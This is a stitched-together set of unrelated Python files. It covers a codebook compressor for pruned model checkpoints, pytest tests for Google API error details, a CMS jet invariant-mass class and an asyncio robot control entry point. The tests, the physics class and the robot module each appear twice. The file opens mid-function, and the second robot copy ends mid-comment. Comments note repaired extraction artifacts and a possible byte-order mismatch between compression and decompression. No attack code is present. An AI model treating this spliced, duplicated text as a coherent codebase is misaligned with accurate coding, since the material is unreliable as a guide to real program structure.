        output.write(np.array(code_value, dtype=codebook_dtype).tobytes())
    compression_index = _get_compression(compression_index)
    compression_weights = _get_compression(compression_weights)
    # Encode index diff list
    if num_bits_idx != 0:
        compression_index(output, idx_diff_list)
    # Walk the reconstructed positions and emit each element's codebook code
    # (gaps split by get_index_list land on zeros, which encode as code 0).
    code_values = np.zeros(len(idx_diff_list), dtype=np.uint32)
    current_idx = -1
    for i, d in enumerate(idx_diff_list):
        current_idx += d + 1
        v = value[current_idx]
        code_values[i] = codebook[v]
    compression_weights(output, code_values)
    return output
def decompress_variable(code, shape, codebook_dtype=np.float16, compression=None):
    """ Decompress a variable.

    This function is the inverse of the `compress_variable` function.

    To perform the decompression, the original shape of the variable must
    be known. In neural networks, this is a property of the model and
    is thus not encoded in the code.

    Parameters
    ----------
    code: The compressed code representing the variable (bytes or a
        readable stream).
    shape: The shape of the variable to decode.
    codebook_dtype: The type of the floating point numbers in the codebook.
    compression: The type of compression to use.

    Returns
    -------
    data: a numpy array of the given shape representing the decoded
    variable information.
    """
    # Accept either a readable stream or raw bytes.
    if hasattr(code, 'read'):
        data = code
    else:
        data = io.BytesIO(code)
    result = np.zeros(np.prod(shape), dtype=np.float32)
    br = BitsReader(data)
    # Header: number of codebook entries excluding the implicit zero.
    codebook_len = br.read(16)
    # Code 0 always decodes to zero; stored entries occupy codes 1..n.
    codebook = {0: 0.0}
    for i in range(codebook_len):
        # NOTE(review): this reconstructs each float from bits assuming a
        # big-endian byte layout, while compress_variable serializes with
        # numpy's native (usually little-endian) tobytes() — confirm the
        # round-trip on little-endian hosts and how BitsReader orders bits.
        if codebook_dtype is np.float16:
            raw = br.read(16).to_bytes(2, byteorder='big')
        elif codebook_dtype is np.float32:
            raw = br.read(32).to_bytes(4, byteorder='big')
        else:
            raise ValueError('Invalid codebook data type')
        codebook[i + 1] = np.frombuffer(raw, dtype=codebook_dtype, count=1)[0]
    if compression is None:
        decompress = _decompress_default
    else:
        decompress = compression.decompress
    # Two streams follow the codebook: the gap list and the per-element codes.
    idx_diff_list = decompress(data)
    values = decompress(data)
    # Rebuild the flat tensor: each gap advances the cursor, each code maps
    # through the codebook.
    current_index = -1
    for c, d in zip(values, idx_diff_list):
        current_index += d + 1
        v = codebook[c]
        result[current_index] = v
    return np.reshape(result, shape)
def compress_checkpoint(checkpoint, variables, compression=None) -> bytes:
    """ Obtains a compressed representation of the given variables in the checkpoint.
    This function assumes that the weights in the checkpoints have already been pruned
    and quantized, and then encodes the checkpoint into an codebook + index + compressed
    values.
    Parameters
    ----------
    checkpoint: the checkpoint to load the variables from. Either a path
        string or an already-loaded checkpoint reader.
    variables: the variables to compress, in the order they should be encoded.
    compression: A compression strategy to use for the codebooks.
    Returns
    -------
    A byte string representing the compressed representation of the tensor.
    """
    if isinstance(checkpoint, str):
        checkpoint = tf.train.load_checkpoint(checkpoint)
    output = io.BytesIO()
    for variable_name in variables:
        variable_value = checkpoint.get_tensor(variable_name)
        # NOTE(review): only the index stream receives the custom compression;
        # the weights stream uses compress_variable's default -- confirm this
        # asymmetry is intended.
        compress_variable(variable_value, output, compression_index=compression)
    # Fixed: the return line was corrupted by extraction artifacts
    # ("return data | 0.887443 | 0.661458 |"); return the buffer contents.
    return output.getvalue()
import pytest
from google import showcase
from google.rpc import error_details_pb2
from google.protobuf import any_pb2
from grpc_status import rpc_status
from google.api_core import exceptions
def create_status(error_details=None):
    """Build a Status proto with code 3 and message "test".

    When *error_details* is provided, it is packed into a protobuf Any and
    appended to the status details list.
    """
    status = rpc_status.status_pb2.Status()
    status.code = 3
    status.message = "test"
    if error_details:
        packed = any_pb2.Any()
        packed.Pack(error_details)
        status.details.append(packed)
    return status
def test_bad_request_details(echo):
    """An error carrying a BadRequest detail surfaces it on the raised exception."""
    def create_bad_request_details():
        bad_request_details = error_details_pb2.BadRequest()
        field_violation = bad_request_details.field_violations.add()
        field_violation.field = "test field"
        field_violation.description = "test description"
        return bad_request_details

    bad_request_details = create_bad_request_details()
    status = create_status(bad_request_details)
    with pytest.raises(exceptions.GoogleAPICallError) as e:
        _ = echo.echo(showcase.EchoRequest(
            error=status,
        ))
    # Fixed: `e` is a pytest.ExceptionInfo wrapper; the raised exception is
    # on `.value` (`e.details` raised AttributeError and never checked anything).
    assert e.value.details == [bad_request_details]
def test_precondition_failure_details(echo):
    """An error carrying a PreconditionFailure detail surfaces it on the exception."""
    def create_precondition_failure_details():
        pf_details = error_details_pb2.PreconditionFailure()
        violation = pf_details.violations.add()
        violation.type = "test type"
        violation.subject = "test subject"
        violation.description = "test description"
        return pf_details

    pf_details = create_precondition_failure_details()
    status = create_status(pf_details)
    with pytest.raises(exceptions.GoogleAPICallError) as e:
        _ = echo.echo(showcase.EchoRequest(
            error=status,
        ))
    # Fixed: the raised exception lives on `e.value`, not on the
    # pytest.ExceptionInfo object itself.
    assert e.value.details == [pf_details]
def test_unknown_details(echo):
    """Details of an unrecognized type are passed through as raw Any messages."""
    status = create_status()
    with pytest.raises(exceptions.GoogleAPICallError) as e:
        _ = echo.echo(showcase.EchoRequest(
            error=status,
        ))
    # Fixed: use `e.value` (pytest.ExceptionInfo wraps the exception) and
    # compare against a plain list, since `details` is a Python list while
    # `status.details` is a protobuf repeated field.
    assert e.value.details == list(status.details)
import pytest
from google import showcase
from google.rpc import error_details_pb2
from google.protobuf import any_pb2
from grpc_status import rpc_status
from google.api_core import exceptions
def create_status(error_details=None):
    """Build a Status proto with code 3 and message "test".

    When *error_details* is provided, it is packed into a protobuf Any and
    appended to the status details list.
    """
    status = rpc_status.status_pb2.Status()
    status.code = 3
    status.message = "test"
    if error_details:
        packed = any_pb2.Any()
        packed.Pack(error_details)
        status.details.append(packed)
    return status
def test_bad_request_details(echo):
    """An error carrying a BadRequest detail surfaces it on the raised exception."""
    def create_bad_request_details():
        bad_request_details = error_details_pb2.BadRequest()
        field_violation = bad_request_details.field_violations.add()
        field_violation.field = "test field"
        field_violation.description = "test description"
        return bad_request_details

    bad_request_details = create_bad_request_details()
    status = create_status(bad_request_details)
    with pytest.raises(exceptions.GoogleAPICallError) as e:
        _ = echo.echo(showcase.EchoRequest(
            error=status,
        ))
    # Fixed: `e` is a pytest.ExceptionInfo wrapper; the raised exception is
    # on `.value` (`e.details` raised AttributeError and never checked anything).
    assert e.value.details == [bad_request_details]
def test_precondition_failure_details(echo):
    """An error carrying a PreconditionFailure detail surfaces it on the exception."""
    def create_precondition_failure_details():
        pf_details = error_details_pb2.PreconditionFailure()
        violation = pf_details.violations.add()
        violation.type = "test type"
        violation.subject = "test subject"
        violation.description = "test description"
        return pf_details

    pf_details = create_precondition_failure_details()
    status = create_status(pf_details)
    with pytest.raises(exceptions.GoogleAPICallError) as e:
        _ = echo.echo(showcase.EchoRequest(
            error=status,
        ))
    # Fixed: the raised exception lives on `e.value`, not on the
    # pytest.ExceptionInfo object itself.
    assert e.value.details == [pf_details]
def test_unknown_details(echo):
    """Details of an unrecognized type are passed through as raw Any messages."""
    status = create_status()
    with pytest.raises(exceptions.GoogleAPICallError) as e:
        _ = echo.echo(showcase.EchoRequest(
            error=status,
        ))
    # Fixed: use `e.value` (pytest.ExceptionInfo wraps the exception) and
    # compare against a plain list, since `details` is a Python list while
    # `status.details` is a protobuf repeated field.
    assert e.value.details == list(status.details)
from __future__ import absolute_import, division, print_function
from time import process_time
import energyflow as ef
import numpy as np
import matplotlib.pyplot as plt
class ParticleDistributionCMS:
    """Group CMS open-data jets by event and compute per-event invariant masses.

    Events are bucketed by jet multiplicity (1 to 4 jets), the jet
    four-vectors of each event are summed component-wise, and the invariant
    mass of the summed vector is computed with energyflow.
    """

    def __init__(self, sim):
        """Extract per-event jet arrays from *sim*.

        sim: assumed to expose `evns`, `particles`, `hard_pids`,
            `jet_pts`/`jet_etas`/`jet_phis`/`jet_ms` and `jets_i` with an
            `evn` column index (energyflow CMS open-data style) --
            TODO confirm against caller.
        """
        sim_numbers = set(sim.evns)
        t1_start = process_time()
        self.event_list = []
        self.event_jet_labels = []
        self.event_pts = []
        self.event_etas = []
        self.event_phis = []
        self.event_ms = []
        print("Starting event processing")
        for i, evn_num in enumerate(sim_numbers, start=1):
            if i % 1000 == 0:
                print("Working on event " + str(i))
            # Compute the per-event jet mask once instead of six times.
            mask = sim.jets_i[:, sim.evn] == evn_num
            self.event_list.append(np.asarray(sim.particles[mask]))
            self.event_jet_labels.append(np.asarray(sim.hard_pids[mask]))
            self.event_pts.append(np.asarray(sim.jet_pts[mask]))
            self.event_etas.append(np.asarray(sim.jet_etas[mask]))
            self.event_phis.append(np.asarray(sim.jet_phis[mask]))
            self.event_ms.append(np.asarray(sim.jet_ms[mask]))
            if i % 1000 == 0:
                print(str(i) + " events processed")
        print()
        print("Starting mass calculation")
        # event_stats[i][j]: the Cartesian four-vector (list of 4 floats) of
        # jet j of event i, from ef.p4s_from_ptyphims.
        self.event_stats = []
        for i in range(len(self.event_pts)):
            self.event_stats.append([])
            for j in range(len(self.event_pts[i])):
                ptyphims = [
                    self.event_pts[i][j],
                    self.event_etas[i][j],
                    self.event_phis[i][j],
                    self.event_ms[i][j],
                ]
                p4s = ef.p4s_from_ptyphims(np.array(ptyphims))
                self.event_stats[i].append(p4s.tolist())
            if i % 1000 == 0:
                print(str(i) + " event masses calculated")
        t1_stop = process_time()
        print("Elapsed time during the whole program in seconds:", t1_stop-t1_start)

    def max_jets_in_event(self):
        """Return the largest jet multiplicity over all events."""
        return max(len(pts) for pts in self.event_pts)

    def num_events(self):
        """Return the number of processed events."""
        return len(self.event_pts)

    def _select_njet_events(self, n):
        """Return (events, stats, labels) for events with exactly *n* jets."""
        indexes = [i for i, evn in enumerate(self.event_list) if len(evn) == n]
        events = [self.event_list[j] for j in indexes]
        stats = [self.event_stats[j] for j in indexes]
        labels = [self.event_jet_labels[j] for j in indexes]
        return events, stats, labels

    def choose_1jet_events(self):
        """Select 1-jet events into event_list_1 / event_stats_1 / labels_1."""
        (self.event_list_1, self.event_stats_1,
         self.event_jet_labels_1) = self._select_njet_events(1)

    def choose_2jet_events(self):
        """Select 2-jet events into event_list_2 / event_stats_2 / labels_2."""
        (self.event_list_2, self.event_stats_2,
         self.event_jet_labels_2) = self._select_njet_events(2)

    def choose_3jet_events(self):
        """Select 3-jet events into event_list_3 / event_stats_3 / labels_3."""
        (self.event_list_3, self.event_stats_3,
         self.event_jet_labels_3) = self._select_njet_events(3)

    def choose_4jet_events(self):
        """Select 4-jet events into event_list_4 / event_stats_4 / labels_4."""
        (self.event_list_4, self.event_stats_4,
         self.event_jet_labels_4) = self._select_njet_events(4)

    def length_1jet_events(self):
        """Number of selected 1-jet events (call choose_1jet_events first)."""
        return len(self.event_list_1)

    def length_2jet_events(self):
        """Number of selected 2-jet events (call choose_2jet_events first)."""
        return len(self.event_list_2)

    def length_3jet_events(self):
        """Number of selected 3-jet events (call choose_3jet_events first)."""
        return len(self.event_list_3)

    def length_4jet_events(self):
        """Number of selected 4-jet events (call choose_4jet_events first)."""
        return len(self.event_list_4)

    @staticmethod
    def _sum_event_4vectors(event_stats):
        """Component-wise sum of all jet four-vectors of each event."""
        return [[sum(jet[k] for jet in event) for k in range(4)]
                for event in event_stats]

    def add_event4vectors_1jet(self):
        """Sum the jet four-vectors of each selected 1-jet event."""
        self.event_stats_added_1 = self._sum_event_4vectors(self.event_stats_1)

    def add_event4vectors_2jet(self):
        """Sum the jet four-vectors of each selected 2-jet event."""
        self.event_stats_added_2 = self._sum_event_4vectors(self.event_stats_2)

    def add_event4vectors_3jet(self):
        """Sum the jet four-vectors of each selected 3-jet event."""
        self.event_stats_added_3 = self._sum_event_4vectors(self.event_stats_3)

    def add_event4vectors_4jet(self):
        """Sum the jet four-vectors of each selected 4-jet event.

        Fixed: the original appended to event_stats_added_3 by mistake.
        """
        self.event_stats_added_4 = self._sum_event_4vectors(self.event_stats_4)

    def _compute_masses(self, added_4vectors):
        """Invariant mass of each summed event four-vector."""
        return [ef.ms_from_p4s(np.array(list(v))) for v in added_4vectors]

    def event_mass_1jet(self):
        # NOTE(review): this attribute shadows the method of the same name
        # after the first call (original behavior, kept for compatibility).
        self.event_mass_1jet = self._compute_masses(self.event_stats_added_1)

    def event_mass_2jet(self):
        # NOTE(review): shadows the method after the first call (original
        # behavior, kept for compatibility).
        self.event_mass_2jet = self._compute_masses(self.event_stats_added_2)

    def event_mass_3jet(self):
        # NOTE(review): shadows the method after the first call (original
        # behavior, kept for compatibility).
        self.event_mass_3jet = self._compute_masses(self.event_stats_added_3)

    def event_mass_4jet(self):
        # Fixed: the original read the bare name `event_stats_added_4`
        # (missing `self.`), raising NameError on every call.
        self.event_mass_4jet = self._compute_masses(self.event_stats_added_4)

    def max_event_njet(self, n):
        """Return the maximum event mass among events with exactly *n* jets."""
        if n == 1:
            return max(self.event_mass_1jet)
        elif n == 2:
            return max(self.event_mass_2jet)
        elif n == 3:
            return max(self.event_mass_3jet)
        elif n == 4:
            return max(self.event_mass_4jet)
        else:
            print("No masses calculated for events of this size")
from __future__ import absolute_import, division, print_function
from time import process_time
import energyflow as ef
import numpy as np
import matplotlib.pyplot as plt
class ParticleDistributionCMS:
    """Group CMS open-data jets by event and compute per-event invariant masses.

    Events are bucketed by jet multiplicity (1 to 4 jets), the jet
    four-vectors of each event are summed component-wise, and the invariant
    mass of the summed vector is computed with energyflow.
    """

    def __init__(self, sim):
        """Extract per-event jet arrays from *sim*.

        sim: assumed to expose `evns`, `particles`, `hard_pids`,
            `jet_pts`/`jet_etas`/`jet_phis`/`jet_ms` and `jets_i` with an
            `evn` column index (energyflow CMS open-data style) --
            TODO confirm against caller.
        """
        sim_numbers = set(sim.evns)
        t1_start = process_time()
        self.event_list = []
        self.event_jet_labels = []
        self.event_pts = []
        self.event_etas = []
        self.event_phis = []
        self.event_ms = []
        print("Starting event processing")
        for i, evn_num in enumerate(sim_numbers, start=1):
            if i % 1000 == 0:
                print("Working on event " + str(i))
            # Compute the per-event jet mask once instead of six times.
            mask = sim.jets_i[:, sim.evn] == evn_num
            self.event_list.append(np.asarray(sim.particles[mask]))
            self.event_jet_labels.append(np.asarray(sim.hard_pids[mask]))
            self.event_pts.append(np.asarray(sim.jet_pts[mask]))
            self.event_etas.append(np.asarray(sim.jet_etas[mask]))
            self.event_phis.append(np.asarray(sim.jet_phis[mask]))
            self.event_ms.append(np.asarray(sim.jet_ms[mask]))
            if i % 1000 == 0:
                print(str(i) + " events processed")
        print()
        print("Starting mass calculation")
        # event_stats[i][j]: the Cartesian four-vector (list of 4 floats) of
        # jet j of event i, from ef.p4s_from_ptyphims.
        self.event_stats = []
        for i in range(len(self.event_pts)):
            self.event_stats.append([])
            for j in range(len(self.event_pts[i])):
                ptyphims = [
                    self.event_pts[i][j],
                    self.event_etas[i][j],
                    self.event_phis[i][j],
                    self.event_ms[i][j],
                ]
                p4s = ef.p4s_from_ptyphims(np.array(ptyphims))
                self.event_stats[i].append(p4s.tolist())
            if i % 1000 == 0:
                print(str(i) + " event masses calculated")
        t1_stop = process_time()
        print("Elapsed time during the whole program in seconds:", t1_stop-t1_start)

    def max_jets_in_event(self):
        """Return the largest jet multiplicity over all events."""
        return max(len(pts) for pts in self.event_pts)

    def num_events(self):
        """Return the number of processed events."""
        return len(self.event_pts)

    def _select_njet_events(self, n):
        """Return (events, stats, labels) for events with exactly *n* jets."""
        indexes = [i for i, evn in enumerate(self.event_list) if len(evn) == n]
        events = [self.event_list[j] for j in indexes]
        stats = [self.event_stats[j] for j in indexes]
        labels = [self.event_jet_labels[j] for j in indexes]
        return events, stats, labels

    def choose_1jet_events(self):
        """Select 1-jet events into event_list_1 / event_stats_1 / labels_1."""
        (self.event_list_1, self.event_stats_1,
         self.event_jet_labels_1) = self._select_njet_events(1)

    def choose_2jet_events(self):
        """Select 2-jet events into event_list_2 / event_stats_2 / labels_2."""
        (self.event_list_2, self.event_stats_2,
         self.event_jet_labels_2) = self._select_njet_events(2)

    def choose_3jet_events(self):
        """Select 3-jet events into event_list_3 / event_stats_3 / labels_3."""
        (self.event_list_3, self.event_stats_3,
         self.event_jet_labels_3) = self._select_njet_events(3)

    def choose_4jet_events(self):
        """Select 4-jet events into event_list_4 / event_stats_4 / labels_4."""
        (self.event_list_4, self.event_stats_4,
         self.event_jet_labels_4) = self._select_njet_events(4)

    def length_1jet_events(self):
        """Number of selected 1-jet events (call choose_1jet_events first)."""
        return len(self.event_list_1)

    def length_2jet_events(self):
        """Number of selected 2-jet events (call choose_2jet_events first)."""
        return len(self.event_list_2)

    def length_3jet_events(self):
        """Number of selected 3-jet events (call choose_3jet_events first)."""
        return len(self.event_list_3)

    def length_4jet_events(self):
        """Number of selected 4-jet events (call choose_4jet_events first)."""
        return len(self.event_list_4)

    @staticmethod
    def _sum_event_4vectors(event_stats):
        """Component-wise sum of all jet four-vectors of each event."""
        return [[sum(jet[k] for jet in event) for k in range(4)]
                for event in event_stats]

    def add_event4vectors_1jet(self):
        """Sum the jet four-vectors of each selected 1-jet event."""
        self.event_stats_added_1 = self._sum_event_4vectors(self.event_stats_1)

    def add_event4vectors_2jet(self):
        """Sum the jet four-vectors of each selected 2-jet event."""
        self.event_stats_added_2 = self._sum_event_4vectors(self.event_stats_2)

    def add_event4vectors_3jet(self):
        """Sum the jet four-vectors of each selected 3-jet event."""
        self.event_stats_added_3 = self._sum_event_4vectors(self.event_stats_3)

    def add_event4vectors_4jet(self):
        """Sum the jet four-vectors of each selected 4-jet event.

        Fixed: the original appended to event_stats_added_3 by mistake.
        """
        self.event_stats_added_4 = self._sum_event_4vectors(self.event_stats_4)

    def _compute_masses(self, added_4vectors):
        """Invariant mass of each summed event four-vector."""
        return [ef.ms_from_p4s(np.array(list(v))) for v in added_4vectors]

    def event_mass_1jet(self):
        # NOTE(review): this attribute shadows the method of the same name
        # after the first call (original behavior, kept for compatibility).
        self.event_mass_1jet = self._compute_masses(self.event_stats_added_1)

    def event_mass_2jet(self):
        # NOTE(review): shadows the method after the first call (original
        # behavior, kept for compatibility).
        self.event_mass_2jet = self._compute_masses(self.event_stats_added_2)

    def event_mass_3jet(self):
        # NOTE(review): shadows the method after the first call (original
        # behavior, kept for compatibility).
        self.event_mass_3jet = self._compute_masses(self.event_stats_added_3)

    def event_mass_4jet(self):
        # Fixed: the original read the bare name `event_stats_added_4`
        # (missing `self.`), raising NameError on every call.
        self.event_mass_4jet = self._compute_masses(self.event_stats_added_4)

    def max_event_njet(self, n):
        """Return the maximum event mass among events with exactly *n* jets."""
        if n == 1:
            return max(self.event_mass_1jet)
        elif n == 2:
            return max(self.event_mass_2jet)
        elif n == 3:
            return max(self.event_mass_3jet)
        elif n == 4:
            return max(self.event_mass_4jet)
        else:
            print("No masses calculated for events of this size")
import asyncio
import math
import os
from collections import deque
from typing import List
import rplidar
from serial.tools import list_ports
from highlevel.adapter.http import HTTPClient
from highlevel.adapter.lidar import LIDARAdapter
from highlevel.adapter.lidar.rplidar import RPLIDARAdapter
from highlevel.adapter.lidar.simulated import SimulatedLIDARAdapter
from highlevel.adapter.socket import SocketAdapter
from highlevel.adapter.socket.isotp import ISOTPSocketAdapter
from highlevel.adapter.socket.loopback import LoopbackSocketAdapter
from highlevel.adapter.web_browser import WebBrowserClient
from highlevel.robot.controller.actuator import ActuatorController
from highlevel.robot.controller.debug import DebugController
from highlevel.robot.controller.match_action import MatchActionController
from highlevel.robot.controller.motion.motion import MotionController
from highlevel.robot.controller.motion.position import PositionController
from highlevel.robot.controller.motion.trajectory import TrajectoryController
from highlevel.robot.controller.obstacle import ObstacleController
from highlevel.robot.controller.strategy import StrategyController
from highlevel.robot.controller.symmetry import SymmetryController
from highlevel.robot.entity.color import Color
from highlevel.robot.entity.configuration import Configuration
from highlevel.robot.entity.configuration import DebugConfiguration
from highlevel.robot.entity.network import NB_SERVO_BOARDS, NET_ADDRESSES_SERVO, NET_ADDRESS_MOTOR
from highlevel.robot.gateway.actuator import ActuatorGateway
from highlevel.robot.gateway.motor import MotorGateway
from highlevel.robot.router import ProtobufRouter
from highlevel.simulation.controller.runner import SimulationRunner
from highlevel.simulation.entity.simulation_configuration import SimulationConfiguration
from highlevel.simulation.entity.simulation_state import SimulationState
from highlevel.simulation.gateway.simulation import SimulationGateway
from highlevel.simulation.router import SimulationRouter
from highlevel.util.clock import RealClock, FakeClock
from highlevel.util.dependency_container import DependencyContainer
from highlevel.util.filter.odometry import odometry_arc
from highlevel.util.filter.pid import PIDConstants, PIDLimits
from highlevel.util.geometry.segment import Segment
from highlevel.util.geometry.vector import Vector2
from highlevel.util.perf_metrics import print_performance_metrics
from highlevel.util.probe import Probe
from highlevel.util.replay_saver import ReplaySaver
# Robot-wide static configuration: geometry, kinematic limits and PID gains.
# Distances appear to be millimetres and angles radians (inferred from the
# values -- TODO confirm against Configuration's documentation).
CONFIG = Configuration(
    initial_position=Vector2(200, 1200),
    initial_angle=0,
    robot_width=380,
    robot_length=240,
    field_shape=(3000, 2000),
    color=Color.BLUE,
    wheel_radius=73.8 / 2,
    encoder_ticks_per_revolution=2400,
    distance_between_wheels=364.26,  # old: 357
    encoder_update_rate=100,
    motor_update_rate=1000,
    # Fixed-point scale used when sending PID gains to the motor board.
    pid_scale_factor=2**16,
    max_wheel_speed=600,
    max_wheel_acceleration=1000,
    max_angular_velocity=1.0 * math.pi,
    max_angular_acceleration=1.4 * math.pi,
    tolerance_distance=1,
    tolerance_angle=0.01,
    trapezoid_anticipation=1.1,
    # Debug web server (websocket stream + HTTP UI), bound on all interfaces.
    debug=DebugConfiguration(
        websocket_port=8080,
        http_port=9090,
        host='0.0.0.0',
        refresh_rate=4,
    ),
    pid_constants_distance=PIDConstants(10, 0, 0),
    pid_constants_angle=PIDConstants(10, 0, 0),
    pid_constants_position_left=PIDConstants(2, 0.0, 1.5),
    pid_constants_position_right=PIDConstants(2, 0.0, 1.5),
    pid_constants_speed_left=PIDConstants(0.39, 2.0, 0.0018),
    pid_constants_speed_right=PIDConstants(0.39, 2.0, 0.0018),
    pid_limits_distance=PIDLimits(1e2, 1e2, 0.0),
    pid_limits_angle=PIDLimits(4.0, 4.0, 0.000),
)
# Simulation parameters; the four obstacle segments are the field walls
# derived from CONFIG.field_shape.
SIMULATION_CONFIG = SimulationConfiguration(
    speed_factor=1e100,  # Run the simulation as fast as possible.
    tickrate=100,
    replay_fps=60,
    lidar_position_rate=11,
    obstacles=[
        # Left, bottom, top and right walls of the field.
        Segment(start=Vector2(0, 0), end=Vector2(0, CONFIG.field_shape[1])),
        Segment(start=Vector2(0, 0), end=Vector2(CONFIG.field_shape[0], 0)),
        Segment(start=Vector2(*CONFIG.field_shape),
                end=Vector2(0, CONFIG.field_shape[1])),
        Segment(start=Vector2(*CONFIG.field_shape),
                end=Vector2(CONFIG.field_shape[0], 0)),
    ])
async def _get_container(simulation: bool, stub_lidar: bool,
                         stub_socket_can: bool) -> DependencyContainer:
    """
    Build the dependency container.

    simulation: register the simulated gateway, clock and runner instead of
        the real hardware adapters.
    stub_lidar: replace the RPLIDAR driver with the simulated adapter.
    stub_socket_can: replace the ISOTP CAN sockets with loopback adapters.
    """
    i = DependencyContainer()
    i.provide('configuration', CONFIG)
    i.provide('protobuf_router', ProtobufRouter)
    i.provide('odometry_function', lambda: odometry_arc)
    i.provide('position_controller', PositionController)
    i.provide('motor_gateway', MotorGateway)
    i.provide('motion_controller', MotionController)
    i.provide('trajectory_controller', TrajectoryController)
    i.provide('strategy_controller', StrategyController)
    i.provide('symmetry_controller', SymmetryController)
    i.provide('obstacle_controller', ObstacleController)
    i.provide('debug_controller', DebugController)
    i.provide('match_action_controller', MatchActionController)
    i.provide('probe', Probe)
    i.provide('event_loop', asyncio.get_event_loop())
    i.provide('http_client', HTTPClient)
    i.provide('web_browser_client', WebBrowserClient)
    i.provide('replay_saver', ReplaySaver)
    # Simulation-only dependencies, plus a fake clock so simulated time can
    # run faster than wall-clock time.
    if simulation:
        i.provide('simulation_configuration', SIMULATION_CONFIG)
        i.provide('simulation_router', SimulationRouter)
        i.provide('simulation_runner', SimulationRunner)
        i.provide(
            'simulation_state',
            SimulationState(time=0,
                            cups=[],
                            left_tick=0,
                            right_tick=0,
                            left_speed=0,
                            right_speed=0,
                            queue_speed_left=deque(),
                            queue_speed_right=deque(),
                            last_position_update=0,
                            last_lidar_update=0))
        i.provide('simulation_gateway', SimulationGateway)
        i.provide('clock', FakeClock)
    else:
        i.provide('clock', RealClock)
    # LIDAR: simulated when simulating or explicitly stubbed, otherwise the
    # first serial port found is assumed to be the RPLIDAR device.
    if simulation or stub_lidar:
        i.provide('lidar_adapter', SimulatedLIDARAdapter)
    else:
        rplidar_obj = rplidar.RPLidar(list_ports.comports()[0].device)
        i.provide('rplidar_object', rplidar_obj)
        i.provide('lidar_adapter', RPLIDARAdapter)
    # CAN sockets: loopback stubs or real ISOTP sockets, one per servo board
    # plus one for the motor board.
    servo_adapter_list: List[SocketAdapter] = []
    if simulation or stub_socket_can:
        i.provide('motor_board_adapter', LoopbackSocketAdapter)
        for _ in range(NB_SERVO_BOARDS):
            servo_adapter_list.append(LoopbackSocketAdapter())
    else:
        i.provide('motor_board_adapter',
                  ISOTPSocketAdapter,
                  address=NET_ADDRESS_MOTOR,
                  adapter_name='motor_board')
        for index in range(NB_SERVO_BOARDS):
            servo_adapter_list.append(
                ISOTPSocketAdapter(address=NET_ADDRESSES_SERVO[index],
                                   adapter_name="servo_board_" + str(index)))
    i.provide('servo_adapters_list', servo_adapter_list)
    i.provide('actuator_gateway', ActuatorGateway)
    i.provide('actuator_controller', ActuatorController)
    return i
# pylint: disable=too-many-locals
async def main() -> None:
    """
    Main function.
    Launch the simulation and the robot.

    Reads the environment flags, builds the dependency container, wires the
    adapters to their controllers, then runs every long-lived coroutine
    until the first one completes, cancels the rest and saves the replay.
    """
    is_simulation = os.environ.get('OUTECH_SIMULATION',
                                   'true').lower() == 'true'
    stub_lidar = os.environ.get('STUB_LIDAR', 'false').lower() == 'true'
    stub_socket_can = os.environ.get('STUB_SOCKET_CAN',
                                     'false').lower() == 'true'
    i = await _get_container(is_simulation, stub_lidar, stub_socket_can)

    # Setup adapters.
    lidar_adapter: LIDARAdapter = i.get('lidar_adapter')
    obstacle_controller: ObstacleController = i.get('obstacle_controller')
    lidar_adapter.register_callback(obstacle_controller.set_detection)
    motor_board_adapter: SocketAdapter = i.get('motor_board_adapter')
    servo_board_adapters: List[SocketAdapter] = i.get('servo_adapters_list')
    # Fixed: the motor board adapter was initialised twice (a second
    # `await motor_board_adapter.init()` sat before the router registration).
    await motor_board_adapter.init()
    for adapter in servo_board_adapters:
        await adapter.init()

    # Register the CAN bus to call the router.
    protobuf_router: ProtobufRouter = i.get('protobuf_router')
    motor_board_adapter.register_callback(protobuf_router.decode_message)
    if is_simulation:
        simulation_router: SimulationRouter = i.get('simulation_router')
        motor_board_adapter.register_callback(
            simulation_router.handle_movement_order)

    strategy_controller = i.get('strategy_controller')
    debug_controller = i.get('debug_controller')
    coroutines_to_run = {
        strategy_controller.run(),
        debug_controller.run(),
        motor_board_adapter.run(),
        print_performance_metrics(),
    }
    if is_simulation:
        simulation_runner = i.get('simulation_runner')
        coroutines_to_run.add(simulation_runner.run())

    done, pending = await asyncio.wait(coroutines_to_run,
                                       return_when=asyncio.FIRST_COMPLETED)
    # Gather the done coroutines to have proper stacktraces.
    await asyncio.gather(*done)
    # Cancel every coroutine that has not stopped yet.
    gather = asyncio.gather(*pending)
    gather.cancel()
    try:
        await gather
    except asyncio.CancelledError:
        pass

    replay_saver = i.get('replay_saver')
    replay_saver.save_replay()
if __name__ == '__main__':
    # Fixed: extraction artifacts were fused onto this line
    # ("| highlevel/main.py | import asyncio").
    asyncio.run(main())
import math
import os
from collections import deque
from typing import List
import rplidar
from serial.tools import list_ports
from highlevel.adapter.http import HTTPClient
from highlevel.adapter.lidar import LIDARAdapter
from highlevel.adapter.lidar.rplidar import RPLIDARAdapter
from highlevel.adapter.lidar.simulated import SimulatedLIDARAdapter
from highlevel.adapter.socket import SocketAdapter
from highlevel.adapter.socket.isotp import ISOTPSocketAdapter
from highlevel.adapter.socket.loopback import LoopbackSocketAdapter
from highlevel.adapter.web_browser import WebBrowserClient
from highlevel.robot.controller.actuator import ActuatorController
from highlevel.robot.controller.debug import DebugController
from highlevel.robot.controller.match_action import MatchActionController
from highlevel.robot.controller.motion.motion import MotionController
from highlevel.robot.controller.motion.position import PositionController
from highlevel.robot.controller.motion.trajectory import TrajectoryController
from highlevel.robot.controller.obstacle import ObstacleController
from highlevel.robot.controller.strategy import StrategyController
from highlevel.robot.controller.symmetry import SymmetryController
from highlevel.robot.entity.color import Color
from highlevel.robot.entity.configuration import Configuration
from highlevel.robot.entity.configuration import DebugConfiguration
from highlevel.robot.entity.network import NB_SERVO_BOARDS, NET_ADDRESSES_SERVO, NET_ADDRESS_MOTOR
from highlevel.robot.gateway.actuator import ActuatorGateway
from highlevel.robot.gateway.motor import MotorGateway
from highlevel.robot.router import ProtobufRouter
from highlevel.simulation.controller.runner import SimulationRunner
from highlevel.simulation.entity.simulation_configuration import SimulationConfiguration
from highlevel.simulation.entity.simulation_state import SimulationState
from highlevel.simulation.gateway.simulation import SimulationGateway
from highlevel.simulation.router import SimulationRouter
from highlevel.util.clock import RealClock, FakeClock
from highlevel.util.dependency_container import DependencyContainer
from highlevel.util.filter.odometry import odometry_arc
from highlevel.util.filter.pid import PIDConstants, PIDLimits
from highlevel.util.geometry.segment import Segment
from highlevel.util.geometry.vector import Vector2
from highlevel.util.perf_metrics import print_performance_metrics
from highlevel.util.probe import Probe
from highlevel.util.replay_saver import ReplaySaver
# Robot-wide static configuration: geometry, kinematic limits and PID gains.
# Distances appear to be millimetres and angles radians (inferred from the
